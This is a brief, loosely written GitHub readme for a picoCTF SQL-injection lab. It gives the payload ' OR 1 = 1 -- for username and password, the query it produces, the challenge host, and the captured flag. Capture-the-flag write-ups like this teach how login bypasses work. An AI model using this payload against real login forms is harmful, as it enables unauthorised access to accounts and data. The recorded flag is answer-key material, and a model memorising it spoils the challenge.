Skip to content

Files

Latest commit

 

History

History

sql_ilite

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
index.html
index.html
 
 
readme.md
readme.md
 
 

readme.md

USE SQL-injection payload list

to attack

Read at README.md

we found that:::

Username: ' OR 1 = 1 -- Password: ' OR 1 = 1 --

===> for first we check at the wrong username and password

So read from .php file

view-source:http://saturn.picoctf.net:62974/#.php

username: ' OR 1 = 1 -- 
password: ' OR 1 = 1 -- 
SQL query: SELECT * FROM users WHERE name='' OR 1 = 1 -- ' AND password='' OR 1 = 1 -- '

Logged in! But can you see the flag, it is in plainsight.

Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_d3c660ac}